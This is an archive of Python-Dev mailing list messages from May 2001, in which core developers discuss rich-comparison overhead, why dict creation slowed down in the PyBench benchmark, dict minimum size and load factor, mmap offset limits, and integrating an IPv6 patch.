I expect it would allow a tremendous cleanup of the > comparison code. It will never reach the simplicity of cmp() -- but > think of Einstein's (?) rule "things should be as simple as they can > be, but no simpler." Clearly cmp() was too simple. :-) > > Anyway, it worries me whenever I hear someone express the thought that > adding rich comparisons to a particular object type would be a bad > idea because it would slow things down. At the moment, "almost all" comparisons in the dynamic sense have no need of richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple. For now richcmps are a tail-wagging-the-dog phenomenon, or more like the tail growing 10 pounds of dense matted hair, making the once-frisky puppy slow to a crawl because its butt is scraping the ground. Martin and I can resolve our differences wrt strings via getting rid of old strcmp entirely. Do you like the implications? 1. Code using cmp(string1, string2) will clearly run significantly slower, calling string comparison 1 (when == obtains), 2 (when < obtains), or 3 (when > obtains) times instead of always once only. Since == is the least likely outcome when using cmp() on strings (you can conclude that by instrumenting Python, or by common sense <0.5 wink>), the number of string compare calls more than doubles in practice for string cmp()-slinging programs (which includes existing well-written tree-based lookup schemes). 2. String dictionary lookup will, unlike the general non-dict case Martin instrumented, never pass the new "are the pointers the same?" richcmp Py_EQ test (because dict lookup already makes that test inline). So if old strcmp goes away, dict lookups that have to resort to strcmp will start paying for hopeless tests. OTOH, the "pointers equal?" test looks of dubious value for the non-dict string case anyway (where it succeeded only 1 in 20 times).
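Tim's first implication can be made concrete with a small model. The C sketch below is hypothetical (CompareOp, string_richcompare and cmp_via_rich are illustrative names, not CPython's API). It emulates a 3-way cmp() using only rich comparisons, asking ==, then <, then >, and counts how many string comparisons each outcome costs.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical stand-ins for Py_EQ / Py_LT / Py_GT. */
typedef enum { OP_EQ, OP_LT, OP_GT } CompareOp;

static int rich_calls;  /* how many times the string comparison ran */

/* One "rich" comparison: answers a single yes/no question. */
static int string_richcompare(const char *a, const char *b, CompareOp op)
{
    assert(a != NULL && b != NULL);
    rich_calls++;
    int c = strcmp(a, b);
    switch (op) {
    case OP_EQ: return c == 0;
    case OP_LT: return c < 0;
    case OP_GT: return c > 0;
    }
    return 0;  /* not reached for valid ops */
}

/* Emulate a 3-way cmp() by asking ==, then <, then >.
   Returns -1, 0 or 1; 2 means "no question answered yes",
   which cannot happen for strcmp-ordered strings. */
static int cmp_via_rich(const char *a, const char *b)
{
    if (string_richcompare(a, b, OP_EQ))
        return 0;
    if (string_richcompare(a, b, OP_LT))
        return -1;
    if (string_richcompare(a, b, OP_GT))
        return 1;
    return 2;
}
```

Equal strings cost one comparison, a "less than" result costs two, and a "greater than" result costs three. Because == is the rarest outcome when cmp() is applied to strings, most calls pay two or three comparisons instead of one.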
#2 is a special case that can be special-cased to death, but #1 likely applies to code using cmp() for comparisons of objects of any type, and that's the primary reason I've resisted adding richcmps to the heavily-compared types (variously string, int, float, long, and type objects). Also the case that adding "a fast path" shouldn't have to endure wading thru multiple gimmicks (kinda defeats the idea of "fast"), so the instant *one* heavily-compared basic type grows a richcmp (there are 0 such today), all should. So that's what I'll aim at. From guido@digicool.com Thu May 17 19:18:27 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 14:18:27 -0400 Subject: [Python-Dev] IPv6 Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com> What's our IPv6 story? I recall that someone once sent me patches, but they didn't work for me. Is it time to try again? In certain circles IPv6 support in Python would be enough to switch programming languages... :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From martin@loewis.home.cs.tu-berlin.de Thu May 17 20:45:29 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 21:45:29 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> > 1. Code using cmp(string1, string2) will clearly run significantly > slower, calling string comparison 1 (when == obtains), 2 (when < > obtains), or 3 (when > obtains) times instead of always once only. I'd like to question the rationale behind this procedure. If a type has both tp_compare and tp_richcompare, and the application is performing cmp(o1, o2): Why is it then a good thing to emulate 3way compare using rich compare?
I just changed the order in do_cmp, to the IMO more correct

    if (v->ob_type == w->ob_type &&
        (f = v->ob_type->tp_compare) != NULL)
        return (*f)(v, w);
    c = try_rich_to_3way_compare(v, w);
    if (c < 2)
        return c;
    c = try_3way_compare(v, w);
    if (c < 2)
        return c;
    return default_3way_compare(v, w);

With that, I got only a single failure in the test suite: test_userlist fails with

    exceptions.RuntimeError: UserList.__cmp__() is obsolete

Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I agree. According to the CVS log, this implementation of do_cmp was installed in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific rationale for doing do_cmp in that order? Regards, Martin From tim@digicool.com Thu May 17 23:55:19 2001 From: tim@digicool.com (Tim Peters) Date: Thu, 17 May 2001 18:55:19 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) Message-ID: The worst percentage hit in both MAL's and Jeremy's pybench run was (here showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's): DictCreation: 87.80 ms 2.93 us +115.72% Assorted things do not account for it: the new overhead of linking and unlinking dicts into the gc list (at creation and destruction times) seems to account for no more than 2%; and the overhead due to using the slower lookdict (as opposed to lookdict_string) even less. Jeremy cheated by running a profiler: the true cause is that dictresize gets called about twice as often. Before 2.1: *before* inserting an item, we checked to see whether the dict was at the resize point. If so, we resized it. Note that this meant PyDict_SetItem could grow a dict even if no new entry was made (and that this was the cause of several excruciating bugs in the 2.1 release cycle, since it meant a dict could get reshuffled merely when replacing the values associated with existing keys).
2.1: *after* inserting an item, and if the key was new (i.e., the dict grew a new entry, as opposed to just replacing the value associated with an existing key), and the dict is at the resize point, we resize it. Now the DictCreation test overwhelmingly creates dicts of size exactly 3. The dict resizes from empty to capacity 4 on the way to gaining 2 entries. When adding the third: Before 2.1: 2 < (2/3)*4 == 8/3, so the dict is not resized and ends up remaining a capacity-4 dict with 3 slots full. This actually violates a documented dict invariant (i.e., that dicts are never more than 2/3 full). 2.1: The third item added is a new item, and 3 > (2/3)*4 == 8/3, so we *do* resize it, and the dict ends up with 3 of 8 slots full. I've got no interest in trying to restore the old behavior. A compromise may be to boost the minimum size of a non-empty dict from 4 to 8. As is, the only non-empty dicts that can get away with using the current minimum size of 4 have no more than 2 elements. The question is whether such tiny non-empty dicts are common enough to make everyone else pay for "an extra" resize. go-ahead-just-*try*-to-prove-your-answer-ly y'rs - tim From skip@pobox.com (Skip Montanaro) Fri May 18 00:21:50 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 17 May 2001 18:21:50 -0500 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <15108.23822.538016.564151@beluga.mojam.com> Guido> In certain circles IPv6 support in Python would be enough to Guido> switch programming languages... :-) Sounds like someone has caught the scent of world domination...
;-) S From jeremy@digicool.com Thu May 17 19:39:07 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 14:39:07 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.6859.810306.811326@slothrop.digicool.com> Another option is to change the benchmark to put one more item in the dict. Then the same number of resizes would occur with both versions of Python. Jeremy From tim.one@home.com Fri May 18 01:08:13 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 17 May 2001 20:08:13 -0400 Subject: [Python-Dev] mmap module In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu> Message-ID: [Paul Barrett] > In the CVS log of the mmapmodule.c, Tim Peters says: > > "The code really needs to be rethought from scratch (not by me, though > ...)." That was in specific reference to the code I changed, in mmap_find_method. The difficulty is that mmap is great for "large files", but the code before my change used a C int for the starting offset and also for the return value; I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 bytes). The mmap_object struct uses size_t to declare the relevant members, which is possibly better still than C long, but may still leave platform capabilities out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit offsets when creating a mapped file view). C is a friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range of C integral types anyway. In other words, if this code is ever to reach its full potential, it "really needs to be rethought from scratch". > Well, I might be the person to do the rethinking, but I'd first like > to know what Tim has in mind. Nothing that you did.
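Two issues in this exchange reduce to the same arithmetic: the 64-bit offset problem Tim describes, and Paul's request for offsets that are not page-size multiples. First, the offset has to travel in a type wide enough for large files (uint64_t or a 64-bit off_t, not int or a 4-byte long). Second, mmap() accepts only aligned offsets, so an unaligned request has to be mapped from the aligned start and the pointer adjusted.

The sketch below is minimal and POSIX-only. It assumes a 64-bit off_t (for example a 64-bit build, or glibc with _FILE_OFFSET_BITS=64). align_down and map_at_offset are hypothetical helpers, not part of Python's mmap module. On Windows the corresponding unit is the allocation granularity reported by GetSystemInfo(), not the page size.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

/* Round offset down to a multiple of granularity (the page size on POSIX). */
static uint64_t align_down(uint64_t offset, uint64_t granularity)
{
    assert(granularity > 0);
    return offset - offset % granularity;
}

/* Map `length` bytes of `fd` starting at an arbitrary byte `offset`.
   mmap() requires a page-aligned file offset, so map from the aligned
   start and return a pointer advanced by the remainder. *base and
   *maplen receive what must later be passed to munmap().
   Returns NULL on failure. */
static const char *map_at_offset(int fd, off_t offset, size_t length,
                                 void **base, size_t *maplen)
{
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0 || offset < 0)
        return NULL;
    uint64_t start = align_down((uint64_t)offset, (uint64_t)page);
    size_t delta = (size_t)((uint64_t)offset - start);

    *maplen = length + delta;
    *base = mmap(NULL, *maplen, PROT_READ, MAP_SHARED, fd, (off_t)start);
    if (*base == MAP_FAILED)
        return NULL;
    return (const char *)*base + delta;
}
```

The alignment step is where a module would need to "grow warts" per platform. Only the granularity source differs between systems; the round-down-and-adjust logic stays the same.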
> I've been playing around with this module lately and tend to agree > that some enhancements could be made, particularly to prevent "bus > errors" and "segmentation faults". When you get one of those, it's a bug in Python! > The ability to have offsets into a file that are not multiples of the > system pagesize would also be nice. It's OS-specific. Python should grow warts to protect against it on the OSes that care. > I'd be willing to submit a PEP on a new mmapmodule, once I know what > others would like. Hard to say. This has the potential to become Python's next thread subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If you do write a PEP, I vote to say that we'll cover Windows and Linux (and maybe Mac OS X?) out of the box, but any other platform is at your own risk (it doesn't really help if somebody pops up volunteering to support a minority platform, because they eventually go away, their code stops working, and it never gets fixed -- so it's use-at-your-own-risk in reality regardless). From tim.one@home.com Fri May 18 01:29:18 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 17 May 2001 20:29:18 -0400 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: [Guido van Rossum] > What's our IPv6 story? Ah! If that's version 6 of the Integer-Point alternative to Floating-Point, I've got it covered. Otherwise my guess is we have no story at all. > I recall that someone once sent me patches, but they didn't work for me. Try recompiling with -DLONG_BIT=33. > Is it time to try again? In certain circles IPv6 support in Python > would be enough to switch programming languages... :-) Floating-point is *that* bad?!
ever-helpful-ly y'rs - tim From jeremy@digicool.com Thu May 17 23:16:15 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 18:16:15 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.19887.534514.864376@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> I've got no interest in trying to restore the old behavior. A TP> compromise may be to boost the minimum size of a non-empty dict TP> from 4 to 8. As is, the only non-empty dicts that can get away TP> with using the current minimum size of 4 have no more than 2 TP> elements. The question is whether such tiny non-empty dicts are TP> common enough to make everyone else pay for "an extra" resize. I also did a profile run on CreateInstances, which has a difference of +55.54% on my machine. It's basically the same story. The instance dictionary is getting resized more often with Python 2.1+ than it did with Python 1.5.2. I wouldn't be surprised if several more tests are showing a slowdown with the same cause. So boosting the minimum size sounds like a good thing. Jeremy From tim.one@home.com Fri May 18 04:26:52 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 17 May 2001 23:26:52 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff> Message-ID: [/F] > more info here: > > http://home.rica.net/alphae/419coal/index.htm > > "A Five Billion US$ (as of 1996, much more now) worldwide > Scam which has run since the early 1980's under Successive > Governments of Nigeria. > > "The Nigerian Scam is, according to published reports, the > Third to Fifth largest industry in Nigeria." 
Most interesting to me is that the US Post Office is upset about this: http://www.usps.gov/websites/depart/inspect/pressrel.htm They don't seem to care so much that people are getting scammed, but that the letters mailed from Nigeria to advance the fee-extorting phase of the scam often use counterfeit postage! Where else but here http://www.usps.gov/websites/depart/inspect/metercap.htm could you learn that "Postage meters are not used in Nigeria -- therefore, all postage meter impressions on Nigerian mail are counterfeit!"? governments-are-mostly-insane-ly y'rs - tim From martin@loewis.home.cs.tu-berlin.de Fri May 18 05:45:21 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 18 May 2001 06:45:21 +0200 Subject: [Python-Dev] IPv6 References: Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de> > What's our IPv6 story? I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) It's still on SF, http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470 There are three problems with that patch, AFAICT: 1. It is too large for any individual to review in one chunk. 2. It quickly gets outdated. 3. It touches core aspects of the socket handling that are IMO better left untouched. I don't know whether the generalization proposed there is necessary to support IPv6 reasonably - the author certainly feels it is. To integrate the patch, I would propose to split it into smaller parts, and submit and review them one-by-one. The first patch should deal only with autoconf stuff, so that the proper #defines are in config.h (although they would not be used right away). The second patch should be a tar file of all new files (the patch on SF actually is missing some files). The third patch should include changes to the C modules, and the last one changes to the standard library modules.
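The patch itself is not reproduced in the thread. As a rough illustration of the kind of generalization Martin mentions: code that used to assume a struct sockaddr_in must carry addresses of either family, typically in a struct sockaddr_storage plus an explicit length.

The POSIX sketch below illustrates that idea. parse_numeric_address is a hypothetical helper, not code from the patch. It handles numeric addresses only; name resolution via getaddrinfo() is left out, and Windows would need the Winsock equivalents.

```c
#include <assert.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Parse a numeric IPv4 or IPv6 address into family-agnostic storage.
   Returns AF_INET or AF_INET6 on success, -1 if text is neither. */
static int parse_numeric_address(const char *text, unsigned short port,
                                 struct sockaddr_storage *out,
                                 socklen_t *outlen)
{
    assert(text != NULL && out != NULL && outlen != NULL);

    struct sockaddr_in v4;
    memset(&v4, 0, sizeof v4);
    if (inet_pton(AF_INET, text, &v4.sin_addr) == 1) {
        v4.sin_family = AF_INET;
        v4.sin_port = htons(port);
        memset(out, 0, sizeof *out);
        memcpy(out, &v4, sizeof v4);   /* copy into the generic storage */
        *outlen = sizeof v4;
        return AF_INET;
    }

    struct sockaddr_in6 v6;
    memset(&v6, 0, sizeof v6);
    if (inet_pton(AF_INET6, text, &v6.sin6_addr) == 1) {
        v6.sin6_family = AF_INET6;
        v6.sin6_port = htons(port);
        memset(out, 0, sizeof *out);
        memcpy(out, &v6, sizeof v6);
        *outlen = sizeof v6;
        return AF_INET6;
    }
    return -1;
}
```

Callers then pass (struct sockaddr *)out and *outlen to bind() or connect() without caring which family was parsed. This is the sort of change that ripples through every place the socket module builds or decodes an address.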
For that procedure to work, we need cooperation from the submitter. For that, we probably need to indicate that we are really interested in his work, and will work with him to integrate it into Python. So far, his impression must be that nobody is interested - the patch has been sitting there since 2000-08-16, making it the oldest open patch. Undoubtedly, integrating this piece of work will result in various problems with Python CVS: it won't build anymore on "funny machines" (like Windows), and it might even crash on code that used to work just fine. This prediction is not based on the actual content of the patch, merely on its size, and the fact that IPv6 support is experimental on many systems. So we'd also need a BDFL pronouncement that we really really want this, and that anybody running into problems should either help fix them, or stay away from CVS while it is being integrated. Regards, Martin From tim@digicool.com Fri May 18 08:17:07 2001 From: tim@digicool.com (Tim Peters) Date: Fri, 18 May 2001 03:17:07 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: [Jeremy] > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. I don't know. PyBench is great for showing that *something* changed, but it's got even less claim to "typical use" than pystone. I don't know that the test suite is better in that respect, but it's got much more variety and everyone has it. I stuffed code in dict_dealloc() to record the ma_fill of each dict on its way to the grave (ma_fill == number of non-virgin slots).
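Tim's instrumentation code is not shown in the thread. One way to picture the idea is a histogram indexed by fill, bumped once per dict from the deallocator. Threshold shares can then be read off as cumulative sums. Under the 2/3 resize rule, "fill at most 2" means a 4-slot table suffices, and "fill at most 5" means an 8-slot table suffices.

The following is a minimal hypothetical sketch. record_fill_at_dealloc, percent_with_fill_at_most and the bucket cap are illustrative assumptions, not dictobject.c code.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_TRACKED_FILL 1024  /* hypothetical cap; larger fills share the top bucket */

static unsigned long fill_counts[MAX_TRACKED_FILL + 1];
static unsigned long dicts_recorded;

/* Hypothetical hook: call once per dict from its deallocator with ma_fill. */
static void record_fill_at_dealloc(size_t fill)
{
    if (fill > MAX_TRACKED_FILL)
        fill = MAX_TRACKED_FILL;
    fill_counts[fill]++;
    dicts_recorded++;
}

/* Percentage of recorded dicts whose fill was at most max_fill. */
static double percent_with_fill_at_most(size_t max_fill)
{
    unsigned long n = 0;
    assert(dicts_recorded > 0);
    if (max_fill > MAX_TRACKED_FILL)
        max_fill = MAX_TRACKED_FILL;
    for (size_t f = 0; f <= max_fill; f++)
        n += fill_counts[f];
    return 100.0 * (double)n / (double)dicts_recorded;
}
```

Note that Tim's table sorts rows by count, so its "cumulative %" column is not ordered by fill. A per-fill histogram like this one answers the "how many dicts fit in N slots" question directly.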
Across the test suite, here's the ranking, from most to least popular fill:

 count  fill  %total  cumulative %
------  ----  ------  ------------
146321     1   53.30         53.30
 38200     0   13.91         67.21
 32616     2   11.88         79.09
 29648     3   10.80         89.89
  9884     5    3.60         93.49
  5423     4    1.98         95.47
  2428     6    0.88         96.35
  2016     8    0.73         97.08
  1179     7    0.43         97.51
   904     9    0.33         97.84
   709   103    0.26         98.10
   554    10    0.20         98.30
   513    13    0.19         98.49
   459    12    0.17         98.66
   447    11    0.16         98.82
   364    14    0.13         98.95
   233    15    0.08         99.04
   231    16    0.08         99.12
   193    18    0.07         99.19
   180    17    0.07         99.26
   122    19    0.04         99.30
   107    30    0.04         99.34
   105    21    0.04         99.38
    93    22    0.03         99.41
    93    20    0.03         99.45
    86   256    0.03         99.48
    82    23    0.03         99.51
    80    26    0.03         99.54
    74    24    0.03         99.56
    69    27    0.03         99.59
    64    25    0.02         99.61
    60    29    0.02         99.63
    49    28    0.02         99.65
    44    34    0.02         99.67
    33    32    0.01         99.68
    28    31    0.01         99.69
    27    37    0.01         99.70
    27    33    0.01         99.71
    26    35    0.01         99.72
    24    36    0.01         99.73
    23    39    0.01         99.74
    23    38    0.01         99.75
    21   128    0.01         99.75
    19    44    0.01         99.76
    19    40    0.01         99.77
    17    46    0.01         99.77
    16    48    0.01         99.78
    15    47    0.01         99.78
    14    50    0.01         99.79
    14    42    0.01         99.79

There are many more sizes, but I cut off the display here when they got too rare to round to 1% of 1% of the total count. Boosting the first non-empty size to 8 would allow 93+% of all dicts to get away with at most one resize (a dict of size 8 is enough for a fill of 5, but not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are alive *at the same time*, it would be quite a waste of space to force the non-empty ones to carry 8 slots. OTOH, if those small dicts are due to things like building one- or two-element keyword argument dicts, their lifetimes rarely overlap. A more aggressive idea is to allow denser dicts, by allowing them to become no more than 75% full.
That is, change the resize test from

    mp->ma_fill*3 >= mp->ma_size*2

to

    mp->ma_fill*4 > mp->ma_size*3

That would allow the 10.8% of real(er) life dicts with fill 3 to continue living in dicts with 4 slots, and allow about 90% of all dicts to get away with no more than one resize. The downside is that boosting the max load factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, a small boost in the expected # of compares. But the "theory" is for random hash functions with "uniform probing" (tech term that does *not* mean linear probing), and Python's hash functions often aren't random at all, while AFAIK no rigorous analysis of its probing strategy exists. So, plenty of arbitrary data there upon which to flip a coin. From mal@lemburg.com Fri May 18 08:26:36 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 09:26:36 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: <3B04CEAC.57251CD7@lemburg.com> Jeremy Hylton wrote: > > >>>>> "TP" == Tim Peters writes: > > TP> I've got no interest in trying to restore the old behavior. A > TP> compromise may be to boost the minimum size of a non-empty dict > TP> from 4 to 8. As is, the only non-empty dicts that can get away > TP> with using the current minimum size of 4 have no more than 2 > TP> elements. The question is whether such tiny non-empty dicts are > TP> common enough to make everyone else pay for "an extra" resize. > > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing.
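The resize arithmetic in this thread can be checked with a small model. The thread contrasts three choices: checking before versus after the insert, Tim's 2/3 test (mp->ma_fill*3 >= mp->ma_size*2) versus his proposed 3/4 test (mp->ma_fill*4 > mp->ma_size*3), and a minimum size of 4 versus 8.

This is a hypothetical sketch, not dictobject.c. It tracks only the fill and the table size, treats every insert as a new key, and simply doubles the size on resize instead of rehashing into a freshly chosen size.

```c
#include <assert.h>
#include <stddef.h>

/* When the load-factor test runs relative to the insert. */
typedef enum { CHECK_BEFORE_INSERT, CHECK_AFTER_INSERT } ResizeTiming;

/* 2/3 load factor: the test quoted in the thread. */
static int over_two_thirds(size_t fill, size_t size)
{
    return fill * 3 >= size * 2;
}

/* 3/4 load factor: the denser variant Tim proposes. */
static int over_three_quarters(size_t fill, size_t size)
{
    return fill * 4 > size * 3;
}

/* Table size after n new-key inserts into a dict that starts with minsize
   slots. Rehashing is not modelled; the size simply doubles on resize. */
static size_t size_after_inserts(size_t n, size_t minsize, ResizeTiming timing,
                                 int (*at_limit)(size_t fill, size_t size))
{
    size_t size = minsize, fill = 0;
    assert(minsize > 0 && at_limit != NULL);
    for (size_t i = 0; i < n; i++) {
        if (timing == CHECK_BEFORE_INSERT && at_limit(fill, size))
            size *= 2;
        fill++;
        if (timing == CHECK_AFTER_INSERT && at_limit(fill, size))
            size *= 2;
    }
    return size;
}
```

The model reproduces the numbers in the thread. With a 4-slot start, the pre-2.1 check-before order leaves three keys in 4 slots, while the 2.1 check-after order resizes to 8. The 3/4 test keeps three keys in 4 slots. An 8-slot table holds 5 keys under the 2/3 rule but not 6.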
FYI, I have a patch which inlines small dictionaries directly into the type object (rather than using malloc to allocate the slot buffer). I've experimented with the minimal size a lot and found that setting it to 8 slots gives the best performance/memory tradeoff. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim@digicool.com Fri May 18 09:32:39 2001 From: tim@digicool.com (Tim Peters) Date: Fri, 18 May 2001 04:32:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com> Message-ID: [MAL] > FYI, I have a patch which inlines small dictionaries directly > into the type object You don't mean that, but how about uploading the patch to SF anyway? Assign it to me and I'll dig into it. > ... > I've experimented with the minimal size a lot and found that > setting it to 8 slots gives the best performance/memory tradeoff. Having done just a couple rounds of instrumented runs across various apps, I was moving to that conclusion too. Also that "small" dicts are so common that avoiding the "extra" malloc would be a nice win for them, and that large dicts are rare enough and resizing expensive enough anyway that the new cost of doing a two-headed allocation strategy would be lost in the noise. IOW, I'm inclined to believe that everything you say your patch does is Good For Python, and Guido is so sympathetic to my lack of sleep lately that I bet he'll let me slip in one uglification without scowling. From mal@lemburg.com Fri May 18 12:36:28 2001 From: mal@lemburg.com (M.-A.
Lemburg) Date: Fri, 18 May 2001 13:36:28 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B05093C.8248AE96@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. Right, I meant the dict object... (the "not enough coffee" thingie again ;-) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the best performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling. I'll see if I find time today to rework the patch for Python CVS. The patch is hiding in my old Python 1.5 killer patch ;-) -- which gives more than a 50% boost on my machine, but that's another story. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 18 12:38:39 2001 From: mal@lemburg.com (M.-A.
Lemburg) Date: Fri, 18 May 2001 13:38:39 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0509BF.A2F84A30@lemburg.com> Tim Peters wrote: > > [Jeremy] > > I also did a profile run on CreateInstances, which has a difference of > > +55.54% on my machine. It's basically the same story. The instance > > dictionary is getting resized more often with Python 2.1+ than it did > > with Python 1.5.2. I wouldn't be surprised if several more tests are > > showing a slowdown with the same cause. > > > > So boosting the minimum size sounds like a good thing. > > I don't know. PyBench is great for showing that *something* changed, but > it's got even less claim to "typical use" than pystone. It doesn't claim "typical use". pybench is aimed at finding performance issues in hot-spots -- there's no such thing as a "typical program", so pybench gives you low-level performance compares for very specific tasks, e.g. dictionary creation or for-loop performance. I have found it to be rather successful at that. At the least, it gives some good hints at where to look... > I don't know that the test suite is better in that respect, but it's got much > more variety and everyone has it. I stuffed code in dict_dealloc() to > record the ma_fill of each dict on its way to the grave (ma_fill == number of > non-virgin slots).
Across the test suite, here's the ranking, from most to
> least popular fill:
>
>  count  fill  %total  cumulative %
> ------  ----  ------  ------------
> 146321     1   53.30         53.30
>  38200     0   13.91         67.21
>  32616     2   11.88         79.09
>  29648     3   10.80         89.89
>   9884     5    3.60         93.49
>   5423     4    1.98         95.47
>   2428     6    0.88         96.35
>   2016     8    0.73         97.08
>   1179     7    0.43         97.51
>    904     9    0.33         97.84
>    709   103    0.26         98.10
>    554    10    0.20         98.30
>    513    13    0.19         98.49
>    459    12    0.17         98.66
>    447    11    0.16         98.82
>    364    14    0.13         98.95
>    233    15    0.08         99.04
>    231    16    0.08         99.12
>    193    18    0.07         99.19
>    180    17    0.07         99.26
>    122    19    0.04         99.30
>    107    30    0.04         99.34
>    105    21    0.04         99.38
>     93    22    0.03         99.41
>     93    20    0.03         99.45
>     86   256    0.03         99.48
>     82    23    0.03         99.51
>     80    26    0.03         99.54
>     74    24    0.03         99.56
>     69    27    0.03         99.59
>     64    25    0.02         99.61
>     60    29    0.02         99.63
>     49    28    0.02         99.65
>     44    34    0.02         99.67
>     33    32    0.01         99.68
>     28    31    0.01         99.69
>     27    37    0.01         99.70
>     27    33    0.01         99.71
>     26    35    0.01         99.72
>     24    36    0.01         99.73
>     23    39    0.01         99.74
>     23    38    0.01         99.75
>     21   128    0.01         99.75
>     19    44    0.01         99.76
>     19    40    0.01         99.77
>     17    46    0.01         99.77
>     16    48    0.01         99.78
>     15    47    0.01         99.78
>     14    50    0.01         99.79
>     14    42    0.01         99.79
>
> There are many more sizes, but I cut off the display here when they got too > rare to round to 1% of 1% of the total count. > > Boosting the first non-empty size to 8 would allow 93+% of all dicts to get > away with at most one resize (a dict of size 8 is enough for a fill of 5, but > not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all > dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are > alive *at the same time*, it would be quite a waste of space to force the > non-empty ones to carry 8 slots. OTOH, if those small dicts are due to > things like building one- or two-element keyword argument dicts, their > lifetimes rarely overlap.

I found that instance dictionaries are usually within the 8-slot range.
You normally have a few heavyweight instances and many lightweight ones which only have two or three attributes in their instance dict. > A more aggressive idea is to allow denser dicts, by allowing them to become > no more than 75% full. That is, change the resize test from
>
>     mp->ma_fill*3 >= mp->ma_size*2
>
> to
>
>     mp->ma_fill*4 > mp->ma_size*3
>
